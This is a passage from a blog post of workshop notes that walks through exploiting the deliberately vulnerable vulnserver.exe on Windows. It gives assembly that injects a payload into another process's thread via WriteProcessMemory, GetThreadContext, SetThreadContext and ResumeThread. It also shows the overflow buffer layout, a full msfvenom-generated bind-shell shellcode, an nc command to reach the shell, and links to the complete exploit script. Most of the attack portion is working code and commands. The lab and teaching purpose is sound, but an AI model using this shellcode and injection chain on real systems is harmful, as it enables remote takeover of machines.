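ESP = 0x017BF99C            # top of the stack in this session
DWORD_ADDR = 0x017BFC30     # holds 0xBAD7DA90, i.e. bytes 90 DA D7 BA in memory
payload_start = DWORD_ADDR + 1   # the first payload byte (0xDA) follows one NOP
SLED_LEN = 100              # "\x90" * 100 placed before calc_shell
OFFSET = 0x274              # value used in ADD BX,274
N_SIZE = 0x01F4             # bytes copied by WriteProcessMemory
CALC_LEN = 220              # payload size reported by msfvenom

# ADD BX,274 only changes the low 16 bits of EBX, so there must be no carry out of them.
low16 = (ESP & 0xFFFF) + OFFSET
assert low16 <= 0xFFFF, "16-bit add would wrap around"
src = (ESP & 0xFFFF0000) | low16

gap = payload_start - src   # NOP bytes copied before the payload itself

print(hex(src), gap, gap + CALC_LEN)
```

With these numbers the copy starts 33 bytes before the payload, inside the sled, and the 500-byte copy comfortably covers the 220-byte calc shellcode.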
Push all the remaining arguments to the stack:
PUSH EBX
PUSH EBP
PUSH ESI
Call the WriteProcessMemory API:
MOV EBX,kernel32.WriteProcessMemory
CALL EBX
To confirm this operation was successful, in Windbg, clear the 160000 in the Memory window and retype it to refresh the data. The memory should no longer be filled with zeroes.
Step 4 - Get the EIP register value in the primary thread
Type the tilde character ~ at the bottom of the Windbg Command window. This lists the threads, where 0 is the primary thread.
The GetThreadContext API will be used here:
BOOL GetThreadContext(
HANDLE hThread,
LPCONTEXT lpContext
);
lpContext points to the CONTEXT structure, which is very big and needs to sit far enough from the top of the stack.
Within the context structure, the ContextFlags value should be 0x10001, which is the sum of:
- 0x10000: indicates a 32-bit x86 context (CONTEXT_i386)
- 0x00001: requests the control registers, which include EIP (together these form CONTEXT_CONTROL)
We'll choose an offset of 0x150, for example, so that when the API populates the structure, the data will not overwrite anything we still need on the stack.
MOV EBX, ESP
SUB BX,150
Create the value 0x10001 in ECX:
XOR ECX,ECX
MOV CX,0FFFF
INC ECX <--- 0FFFF + 1 = 10000
INC ECX <--- 10000 + 1 = 10001
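The same three instructions can be traced in a few lines. This sketch (Python 3 assumed) models the 16-bit write to CX and the two increments, then compares the result with the flag constants as I understand them from the x86 CONTEXT definitions.

```python
CONTEXT_i386 = 0x00010000
CONTEXT_CONTROL = CONTEXT_i386 | 0x00000001

ecx = 0                                  # XOR ECX,ECX
ecx = (ecx & 0xFFFF0000) | 0xFFFF        # MOV CX,0FFFF (low 16 bits only)
ecx = (ecx + 1) & 0xFFFFFFFF             # INC ECX
after_first_inc = ecx
ecx = (ecx + 1) & 0xFFFFFFFF             # INC ECX

print(hex(after_first_inc), hex(ecx))
```

Loading 0xFFFF and incrementing twice avoids the null bytes that a direct MOV ECX,10001 would put in the instruction.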
Write the value of ECX (0x10001) to the memory location that EBX points to, which is the ContextFlags field at the start of the structure.
MOV DWORD PTR DS:[EBX],ECX
Push EBX. This is the lpContext argument, which is pushed first:
PUSH EBX
Push the next argument, hThread:
PUSH EDI
Call the API:
MOV EBX,kernel32.GetThreadContext
CALL EBX
Step 5 - Change EIP register value into the allocated memory address.
Now that the EIP register value has been retrieved via GetThreadContext, SetThreadContext can be used to set the value of EIP:
BOOL SetThreadContext(
HANDLE hThread,
const CONTEXT *lpContext
);
In the debugger, double click the address at the top of the stack and scroll up to the address that holds the thread's start address (the EIP value returned by GetThreadContext). Here it shows an offset of 98 (hex).
MOV ECX,ESP
SUB CL,98
Write EBP, which contains the start of the allocated memory (160000), to that location:
MOV DWORD PTR DS:[ECX],EBP
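The offset 98 is not arbitrary. A minimal sketch of the arithmetic follows (Python 3 assumed), under two assumptions of mine: that the Eip field sits at offset 0xB8 inside the 32-bit CONTEXT structure, and that ESP has the illustrative value below when these instructions run.

```python
CONTEXT_OFFSET = 0x150   # SUB BX,150: the structure starts this far below ESP
EIP_OFFSET = 0xB8        # assumed offset of Eip inside the x86 CONTEXT structure

esp = 0x017BF9A4         # illustrative value, not taken from the debugger

context_ptr = esp - CONTEXT_OFFSET
eip_slot = context_ptr + EIP_OFFSET
distance = esp - eip_slot            # how far below ESP the saved EIP lives

# SUB CL,98 only changes the lowest byte of ECX, so it must not borrow.
assert (esp & 0xFF) >= 0x98, "8-bit subtract would borrow"
ecx = (esp & 0xFFFFFF00) | ((esp & 0xFF) - 0x98)

print(hex(context_ptr), hex(eip_slot), hex(distance), hex(ecx))
```

The distance works out to 0x150 - 0xB8 = 0x98, so ECX ends up pointing at the saved EIP. Because only CL is modified, this relies on the low byte of ESP being at least 0x98, which is worth checking in the debugger.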
EBX has to point at the context structure again, because it was overwritten when the previous API address was loaded into it.
MOV EBX,ESP
SUB BX,150
Push the two arguments for SetThreadContext and call the API:
PUSH EBX
PUSH EDI
MOV EBX,kernel32.SetThreadContext
CALL EBX
In the Windbg Command window, type the following command. "~0" selects the primary thread 0, "e" executes a command for it, and "r" displays its registers.
~0 e r
Check the value of the EIP register to confirm that it was successfully overwritten with 160000.
Step 6 - Resume the thread to execute the bind shell.
The ResumeThread API accepts only one argument, which is the thread handle:
DWORD ResumeThread(
HANDLE hThread
);
Push this to the stack and call the API:
PUSH EDI
MOV EBX,kernel32.ResumeThread
CALL EBX
In the Windbg Command window, type "g" to resume execution, which will run the instructions at the memory address pointed to by the EIP register. This will execute the PoC shellcode and a calculator window should pop up at this point.
Step 7 - Terminate vulnserver.exe
If I call the ExitProcess API here, it will exit the vulnserver process and make port 9999 available again.
Before that, it's recommended to call the Sleep API to make our cmd.exe process sleep for 5 seconds, so that the vulnserver process has enough time to exit and release port 9999:
void Sleep(
DWORD dwMilliseconds
);
Scroll down the stack and find somewhere in the NOP sled, close to the bind shellcode, to place the instructions which call the Sleep API:
XOR ECX,ECX
MOV CL,88
MOV CH,13 # hex value 0x1388 (5000 in decimal)
PUSH ECX
MOV EBX,kernel32.Sleep
CALL EBX
Remember to put some padding between Sleep and Bind Shell:
shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90"*10+ payload + "C"*(2500-len(payload)-4-2003-10) + "\x90"*100 + sleep + "\x90"*10 + calc_shell
Time to call the ExitProcess API:
void ExitProcess(
UINT uExitCode
);
Give uExitCode a zero value:
XOR ECX,ECX
PUSH ECX
MOV EBX,kernel32.ExitProcess
CALL EBX
Run the exploit and check that it pops calculator after sleeping for 5 seconds.
If everything's good, we can replace the payload so that, instead of popping calc, it creates a bind shell that accepts connections on port 9999, which has been released by the vulnserver process.
Generate the shellcode for the bind shell and assign the payload to a variable in the script.
msfvenom -a x86 -platform Windows -p windows/shell_bind_tcp LPORT=9999 -e x86/shikata_ga_nai -b "\x00" -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 355 (iteration=0)
x86/shikata_ga_nai chosen with final size 355
Payload size: 355 bytes
Final size of c file: 1516 bytes
unsigned char buf[] =
"\xbb\x80\x9d\xd1\x48\xdb\xd4\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x53\x31\x5a\x12\x83\xea\xfc\x03\xda\x93\x33\xbd\x26\x43\x31"
"\x3e\xd6\x94\x56\xb6\x33\xa5\x56\xac\x30\x96\x66\xa6\x14\x1b"
"\x0c\xea\x8c\xa8\x60\x23\xa3\x19\xce\x15\x8a\x9a\x63\x65\x8d"
"\x18\x7e\xba\x6d\x20\xb1\xcf\x6c\x65\xac\x22\x3c\x3e\xba\x91"
"\xd0\x4b\xf6\x29\x5b\x07\x16\x2a\xb8\xd0\x19\x1b\x6f\x6a\x40"
"\xbb\x8e\xbf\xf8\xf2\x88\xdc\xc5\x4d\x23\x16\xb1\x4f\xe5\x66"
"\x3a\xe3\xc8\x46\xc9\xfd\x0d\x60\x32\x88\x67\x92\xcf\x8b\xbc"
"\xe8\x0b\x19\x26\x4a\xdf\xb9\x82\x6a\x0c\x5f\x41\x60\xf9\x2b"
"\x0d\x65\xfc\xf8\x26\x91\x75\xff\xe8\x13\xcd\x24\x2c\x7f\x95"
"\x45\x75\x25\x78\x79\x65\x86\x25\xdf\xee\x2b\x31\x52\xad\x23"
"\xf6\x5f\x4d\xb4\x90\xe8\x3e\x86\x3f\x43\xa8\xaa\xc8\x4d\x2f"
"\xcc\xe2\x2a\xbf\x33\x0d\x4b\x96\xf7\x59\x1b\x80\xde\xe1\xf0"
"\x50\xde\x37\x6c\x58\x79\xe8\x93\xa5\x39\x58\x14\x05\xd2\xb2"
"\x9b\x7a\xc2\xbc\x71\x13\x6b\x41\x7a\x3c\x63\xcc\x9c\x28\x6b"
"\x98\x37\xc4\x49\xff\x8f\x73\xb1\xd5\xa7\x13\xfa\x3f\x7f\x1c"
"\xfb\x15\xd7\x8a\x70\x7a\xe3\xab\x86\x57\x43\xbc\x11\x2d\x02"
"\x8f\x80\x32\x0f\x67\x20\xa0\xd4\x77\x2f\xd9\x42\x20\x78\x2f"
"\x9b\xa4\x94\x16\x35\xda\x64\xce\x7e\x5e\xb3\x33\x80\x5f\x36"
"\x0f\xa6\x4f\x8e\x90\xe2\x3b\x5e\xc7\xbc\x95\x18\xb1\x0e\x4f"
"\xf3\x6e\xd9\x07\x82\x5c\xda\x51\x8b\x88\xac\xbd\x3a\x65\xe9"
"\xc2\xf3\xe1\xfd\xbb\xe9\x91\x02\x16\xaa\xa2\x48\x3a\x9b\x2a"
"\x15\xaf\x99\x36\xa6\x1a\xdd\x4e\x25\xae\x9e\xb4\x35\xdb\x9b"
"\xf1\xf1\x30\xd6\x6a\x94\x36\x45\x8a\xbd";
Final test
Exit the debugger, run vulnserver on the victim's machine, then run the exploit script in Kali.
After 5 seconds, connect to the remote machine on port 9999 and you should reach the Windows bind shell:
nc 172.16.202.133 9999
Here's the complete exp.py file:
https://drive.google.com/file/d/1lqnOAvZAnDs4fvJqaYSU20l-DcXMqqmH/view
https://pastebin.com/fAh45H3T
Thoughts
It was a fun hands-on workshop that allowed me to practice some advanced pentest techniques, writing shellcode, and debugging. This workshop requires a basic understanding of buffer overflows and the different registers in assembly language as prerequisite knowledge.
Arnold was a very patient instructor and helped participants of varying skill levels understand the concepts.
As a disclaimer, I might have skipped some steps or explanations in this post, and it is by no means meant to be a thorough walkthrough. It only serves as my personal notes so that I can remember what I learned during the workshop.
Please read the original tutorial in Anthony's blog here for a more holistic view of the technique, and feel free to contact him if you wish to attend similar workshops in the future.